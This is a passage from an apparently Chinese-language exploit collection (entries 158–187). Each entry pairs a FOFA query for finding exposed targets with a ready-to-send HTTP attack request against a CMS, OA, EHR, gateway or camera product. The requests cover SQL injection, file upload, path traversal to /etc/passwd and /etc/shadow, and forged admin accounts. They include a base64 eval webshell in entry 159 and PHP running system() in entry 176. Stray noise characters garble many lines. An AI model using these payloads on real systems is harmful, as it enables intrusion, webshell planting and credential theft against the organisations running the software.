Content-Disposition: form-data; name="filetitile"
, h" i. C4 z) G* s- S
) I& N* |4 i/ G1 d' ^' _. bnull
" u3 k+ [" d2 k2 a------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"
7 N, ^$ u* F) \
3 k% M( A( Q9 P' n1 enull
7 x! \/ T# r8 `) W; b+ x4 b------WebKitFormBoundary1imovELzPsfzp5dN--


- b: W) |! u# whttp://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura-CMS-processAsyncObject存在SQL注入
7 U8 ]& a3 @( W" D) t' Y8 {$ qCVE-2024-32640
6 ^/ \0 }) ~* V/ p1 q  JFOFA："Generator: Masa CMS"
6 X$ C! z( u+ {- gPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
" B3 Q3 r' G  u2 fContent-Type: application/x-www-form-urlencoded
0 L7 n9 F' s, k# o2 }3 g
object=displayregion&contenthistid=x\'&previewid=1
$ Q: d4 w! l, U- A' K* M# A# L" B$ h" ~

159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传
FOFA："INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
! l& i  s- c$ ~: I2 sPOST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
6 A- I) |9 M4 E1 |' V! n* EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
! |. v: u! o3 y# u6 EContent-Length: 1080
2 a  {  x6 D. ^$ W; Q8 v+ ]Accept-Encoding: gzip, deflate
( b; N0 ]1 \: [/ y' \  @Connection: close
Content-Type: text/xml; charset=utf-8
3 t" o! i1 i! E) Z$ eSoapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
6 {& g1 {! Z% M" {: E<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
</jobUpload>
- r+ V4 ~2 x8 V9 h+ b7 o</soap:Body>
</soap:Envelope>
! J* M8 Q9 [3 S0 Y4 F$ f

; G5 J6 l6 v$ X, f8 B, ?/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")
, o: m, d5 g5 [6 D# v( W

4 n. H* r+ z/ u1 N' ?$ F% y# J160. Sonatype Nexus Repository 3目录遍历与文件读取
CVE-2024-4956
FOFA：title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
$ P! v( `  ]3 y# p* LHost: x.x.x.x
0 @* j+ r! Z" X9 D: s2 k' U- k5 eUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
6 A/ j8 d; t' w1 c7 T3 ]$ kAccept-Encoding: gzip

" @0 ^4 T; X# ^+ ~  s6 Q$ h8 k  B
/ y* `  t6 V% ]. h161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
FOFA：body="/KT_Css/qd_defaul.css"
( z" u8 V+ v. O0 n% u+ H5 r+ E4 N第一步，上传文件<fileName>字段指定文件名，<fileFlow>字段指定文件内容，内容需要base64加密
' u) _1 e7 x2 t2 {7 B5 X7 _: {POST /Webservice.asmx HTTP/1.1
, F0 j: g  V' m0 T; ~$ b3 jHost: x.x.x.x
& T7 J1 p$ z4 }! W9 V8 gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
6 V) \6 A. V, U& E5 p4 a; x/ OContent-Length: 445
* j8 [# v8 V# LContent-Type: text/xml
7 P. U( E1 N7 B, B0 uAccept-Encoding: gzip
* F' d. w1 C& c
<?xml version="1.0" encoding="utf-8"?>
  q" M. a% A5 T5 S& d<soap:Envelope xmlns:xsi="
! b, R* x5 L( W/ Y$ k' ]http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
& Y4 m- `8 n; m. v; k<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
8 n; Q+ p+ N. r! ~7 x$ J<ip>1</ip>
( N  l  Z) Y# V2 a0 e9 K9 e: o9 @<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
0 H4 j+ D7 n( c) e0 {0 T</soap:Body>
/ Y% u& [; M+ `' C! N" M</soap:Envelope>
/ `. V5 G1 }8 q* l

1 v+ m& Z3 q3 W5 N( B; J/ ]http://x.x.x.x/dizxdell.aspx

162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
/ \/ W# N( M9 W2 O  T0 v% d( ~- kFOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
( Z6 a$ ~: r4 |! i, `3 }" WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip
9 w& _( p/ @# u4 \
' G! [5 z3 i; e' O0 E0 S3 w------WebKitFormBoundaryeegvclmyurlotuey
. k2 v3 u$ }! V5 l* B/ a7 @Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
% [9 v; i( C# _! |5 b# RContent-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
$ O4 n9 M5 Q9 j8 fContent-Disposition: form-data; name="action"

upload
8 M+ o: X, V. [  S* c! Q' Z% w; c------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
, c* x; ]: Y6 U$ _; v) A3 ^' g3 R------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"
% u  u! g$ w2 t) Y
/opt/resources
# ^0 |% |# P" n  W3 k------WebKitFormBoundaryeegvclmyurlotuey--

8 i0 E6 }- f* Q, m( T' v; P  D2 k
0 Z* z/ e; P; _% `( j9 vhttp://x.x.x.x/opt/resources/kjuhitjgk.aspx
- U  u( {# _$ C) O# O
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
- m; i/ ^+ o3 y/ s# h& XConnection: close
Content-Length: 293
) u2 Z3 q; V4 L* l% p6 eAccept: */*
- K3 }& O& B) Z: U1 M6 VAccept-Encoding: gzip, deflate
! V2 A9 D% H" O3 G- r3 n! ?6 P# gAccept-Language: zh-CN,zh;q=0.9
6 u/ |7 Y% B7 ~1 j4 G8 s; nContent-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod
1 h% ~4 J# Q- Z. ]* J9 u9 I$ T
------iiqvnofupvhdyrcoqyuujyetjvqgocod
+ l# k# P( `" F3 g  EContent-Disposition: form-data; name="name"

. D% T4 {3 M( T" F0 n1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
$ I/ c  G4 s! T* V4 Y$ GContent-Type: image/jpeg

rvjhvbhwwuooyiioxega
( S6 n) F. G, S2 H/ V------iiqvnofupvhdyrcoqyuujyetjvqgocod--

5 \9 c( j1 L9 o- }: o/ T' O% y% ?
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
FOFA: title="智慧综合管理平台登入"
& \' p) n! E% \) u1 h5 lPOST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
  H7 b8 c+ F0 }# PHost: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
' h7 z0 J. N2 t0 Y3 }' _7 zContent-Length: 288
1 z% r: M5 s' Q) P" q7 eAccept: application/json, text/javascript, */*; q=0.01
- a+ ?7 \$ P/ L! n& P! _2 VAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
0 y# t# m5 V  |; `5 }: h' MContent-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
- H; e6 @* l( H9 v6 [" l5 u  jContent-Type: image/jpeg
* ?1 |" }$ E9 R2 J; g6 x) ]
2 V; Y0 b2 ~% V6 [<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
8 F) D: L9 g$ p: y, o0 H& r------dqdaieopnozbkapjacdbdthlvtlyl--
% ]: ?; c, _$ j
5 V' p* W: x! C- y: C8 o" j& ?
http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
7 M. Q( Z6 I5 x6 S' I* c5 k
165. OrangeHRM 3.3.3 SQL 注入
& C+ Y3 c" f% v% O* yCVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))
- x; w) L9 f  n  G* c3 L4 Z/ r* V
! K, ], K; a4 g; n- d
166. 中成科信票务管理平台SeatMapHandler SQL注入
FOFA：body="技术支持：北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
! W$ [$ p; I4 }7 [' FUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
( V8 y$ B* ?% ~* P& WAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
) A8 w) z) O; `Content-Type: application/x-www-form-urlencoded
8 z# O3 }0 r5 sContent-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE
9 I' J0 {8 h# D0 m$ k) ?- |
' S+ S' v! `6 R( B
167. 精益价值管理系统 DownLoad.aspx任意文件读取
, [1 S6 }! b% Y, K5 v* D3 j3 LFOFA：body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
* L) v* J: w7 T/ |GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
0 \. b1 I: x* p" a* s, B, uHost:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
5 ]' a* @& L' u" {# Y5 t; EContent-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


- G) l- p. V0 L% q3 n. F2 @8 Z168. 宏景EHR OutputCode 任意文件读取
: H7 Z5 o/ p1 e1 U! y" e1 Q! a7 ?7 TFOFA：app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
  `% S, t; T+ \" CHost: your-ip
- K$ N$ i. o$ _+ h/ z( tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close



4 Q; U1 a" z! R169. 宏景EHR downlawbase SQL注入
FOFA：app="HJSOFT-HCM"
9 K2 R3 y9 _( R$ {6 O2 d+ P, e# OGET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
9 \/ H  T2 Z- \8 hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
1 Q' y0 i. D! D* |Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

1 u5 p/ J0 I/ }7 _
' v! `, d( R# J! n3 S2 D
170. 宏景EHR DisplayExcelCustomReport 任意文件读取
FOFA：body="/general/sys/hjaxmanage.js"
, k9 o8 Y: m$ \& C1 i/ QPOST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
" ~7 I) q. L/ Q3 D0 u( q/ a+ aContent-Type: application/x-www-form-urlencoded

' B! ~; S; v/ Hfilename=../webapps/ROOT/WEB-INF/web.xml
& E, C8 ~9 ^- T

171. 通天星CMSV6车载定位监控平台 SQL注入
FOFA：body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
; \1 A  _2 \" I1 w6 D+ cUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
% X( i- F. N9 A- r& [Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
& c; [' Z/ \4 u* rConnection: close

- g4 U- B/ l  B- D/ b4 ?' s# Q0 v
/ L" g2 A( S) Z1 N
" a8 X' t9 g' M$ `172. DT-高清车牌识别摄像机任意文件读取
3 }% ]1 N, X3 ?( {7 D$ _1 sFOFA：app="DT-高清车牌识别摄像机"
$ W2 C5 Z' q& W) u$ z) MGET /../../../../etc/passwd HTTP/1.1
- c/ w1 @- F! eHost: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
" m: d$ I# R& W$ ~Connection: keep-alive


5 R8 J2 D0 D: [$ N. }
173. Check Point 安全网关任意文件读取
/ D- K/ J  l' V6 y: w" _CVE-2024-24919
FOFA：app="Check_Point-SSL-Network-Extender"
3 G/ T5 r$ |8 f. N+ y* CPOST /clients/MyCRL HTTP/1.1
Host: your-ip
0 X8 Z$ o3 r  _9 ?Content-Type: application/x-www-form-urlencoded
' t6 U. J4 Q7 P
aCSHELL/../../../../../../../etc/shadow


0 E1 \  B# _: @+ P  {7 X, r% T+ Q
174. 金和OA C6 FileDownLoad.aspx 任意文件读取
5 R; [* j+ c8 y: `4 {: ]FOFA：app="金和网络-金和OA"
- I/ ^* a) f1 j  Y+ PGET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
; O- l- I& b7 W# R% fAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
7 D' T5 r/ ]! [$ B: v; j8 OAccept-Language: zh-CN,zh;q=0.9
& c, n, m( b9 M4 ]Connection: close


8 i" O) y, J) E: Q3 B
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
7 K) c) D- T2 HFOFA：app="金和网络-金和OA"
0 r1 G9 O: d) BGET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
' P2 i$ p' \1 p1 BHost:
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
& U/ H) T* I$ n
. ^- d5 n+ ?6 U, N- q
176. 电信网关配置管理系统 rewrite.php 文件上传
8 f1 S1 k  o, ~. y# QFOFA：body="img/login_bg3.png" && body="系统登录"
9 C3 H7 i" t! a/ N3 f9 |4 _' iPOST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
  l: b- v, E& h  ?' cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
" O8 u! }: F2 u4 H6 G$ D" b8 uConnection: close
  L5 J# J) }' Z- k: j
------WebKitFormBoundaryOKldnDPT
/ G2 y$ k7 e7 `$ k) I5 GContent-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png
! g- w; Y5 m; _, _7 s# Z& X( k# |
<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"
: q1 f; f, R0 d: |; b: e

------WebKitFormBoundaryOKldnDPT--
- c- N& z0 K( D4 J( @, d" ?
$ p+ R' P. z3 [$ t" D
& R" U* ?! a" n) _+ A' u
0 I: _0 t/ M: p) ?1 H% [+ V. R177. H3C路由器敏感信息泄露
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
& y/ H3 ]7 E  a8 o% X1 @/userLogin.asp/../actionpolicy_status/../M60.cfg
/ L- @4 N/ q6 X( R/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
6 m+ D6 W1 x2 C/userLogin.asp/../actionpolicy_status/../GR2200.cfg
6 y, a0 ?8 k4 J( W9 A' \- Y0 ~/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
' z* D) L3 I% W2 `6 t2 w5 {/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
5 X5 y; l1 `# W; ?; @8 P/userLogin.asp/../actionpolicy_status/../ER5200.cfg
* C5 _0 ^9 P; p; Z1 \! ?7 m# x6 b/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
; T5 h5 b4 B; ]# |1 C- P/userLogin.asp/../actionpolicy_status/../ER3260.cfg
2 O3 t* B/ N, o, `/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
3 x3 D7 E  _5 I: e4 [1 M, s/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
- K: i0 k0 D: `/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
, M( L) j" t% `+ ^/userLogin.asp/../actionpolicy_status/../ER3100.cfg
& |& ]0 q# |  J& Y# ?/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg
" z) W1 \/ S0 u7 r. j& M( _6 l
# ], G8 R( j0 {  M# g
178. H3C校园网自助服务系统-flexfileupload-任意文件上传
FOFA：header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
' x# O% a& L' P4 Y0 lHost:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
( r+ z/ z$ g6 G: iContent-Length: 252
3 C6 ?. O9 g4 N1 E5 W# M% ]- y$ yAccept-Encoding: gzip, deflate
5 G$ j! a0 S  w% y6 M5 j3 jConnection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l
8 G  A' R# i3 J7 X9 \/ y-----------------aqutkea7vvanpqy3rh2l
( q4 g1 _$ m" _9 D, I' q6 BContent-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

  W: s  e3 @' |& \3 n% @8 G5 [12234
-----------------aqutkea7vvanpqy3rh2l--

; ]) Y4 _. _# ~9 y8 m
4 {) _2 p7 z* _3 I% YGET /imc/primepush/%2e%2e/flex/12234.txt


179. 建文工程管理系统存在任意文件读取
POST /Common/DownLoad2.aspx HTTP/1.1
7 z1 P+ Q/ v/ G% c% `Host: {{Hostname}}
  v7 O8 l5 |! _2 JContent-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0
  K# j$ e8 C! y" e; N" `
path=../log4net.config&Name=
2 D, }- B* D4 \7 ^" |2 r6 F1 N. G
2 o4 j2 a. Q4 L/ }! H
180. 帮管客 CRM jiliyu SQL注入
* g5 N. T- a# ~FOFA：app="帮管客-CRM"
, D+ u) G) |- C, o* g0 F. OGET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
4 g! @! ]" k. [& I9 |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
: F0 {; K: [, }* UAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
% p5 l% a* ~4 J4 i- j/ F) AAccept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
8 F" f# i+ d1 |" R1 f, W

# h: {* `0 A7 S7 z9 C! z# U181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
FOFA："PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
$ `) S2 O6 P# E8 QHost: your-ip
- @* c( x8 V% N% v/ d; c  jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
% o( G4 p. d, r2 X+ j. sAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
8 o( |6 G+ f2 ~, A1 e" g3 ]6 HAccept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
! E  W  ?3 M# B# r9 u4 ~0 r

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20


182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
  {# X  W+ F5 c( W$ I- p* @FOFA："PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
+ M3 p9 Q# N( M/ S# KAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
$ [/ e- }" W) hConnection: close
Content-Type: application/x-www-form-urlencoded

" X  O% z' X3 F+ X7 n
username=test1234&pwd=test1234&savedays=1

/ _, y& d4 g/ l$ N& m
# B2 O, A, Z5 w9 M5 s183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
3 C1 H& N. O" d7 g: qFOFA：body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
$ N% q# r: ~. i- y, m1 aGET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
+ L  G) C" P& F7 iAccept-Charset: utf-8
  D6 p: E) v& c$ {Accept-Encoding: gzip, deflate
( t2 B" M3 D/ n8 I; T: H6 v; pConnection: close
# U/ ~' V3 z6 L, O2 z( e8 k/ H

184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
/ G! S  `$ y) A  T( J* Z; {FOFA：server="SunFull-Webs"
& D5 C, P; ]6 x2 S1 ePOST /soap/AddUser HTTP/1.1
Host: your-ip
* |! u& h6 A- J/ vAccept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  I' W$ d* t3 O8 s* d/ k. tX-Requested-With: XMLHttpRequest


1 ]3 K' B8 a* L, o$ linsert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')
3 Z/ P+ r9 R% S0 H5 \4 Q+ d' Q0 G
' g8 }, J9 ?" k5 n0 N8 ?
185. 瑞友天翼应用虚拟化系统SQL注入
  e& T2 \! G2 s* {) wversion < 7.0.5.1
0 {. m5 u1 H& L8 F# k0 |( @FOFA：app="REALOR-天翼应用虚拟化系统"
- o" n( z+ ?8 x8 l/ Z) c" `& A; _& pGET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host


0 Y1 U2 p5 r6 S, W, E186. F-logic DataCube3 SQL注入
  ?( h6 K3 O7 v" f8 R& tCVE-2024-31750
. O* i6 q2 S- JF-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统
FOFA：title=="DataCube3"
# J( ~, B' U) h% r, }POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
( u9 W) ?/ ?9 H8 XHost: your-ip
% W! r, |7 t0 L+ P0 PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 r, @* U4 a7 g) ZAccept-Encoding: gzip, deflate
Connection: close
8 M& Y# b+ ^2 pContent-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450
* O4 d3 u6 Q% f

187. Mura CMS processAsyncObject SQL注入
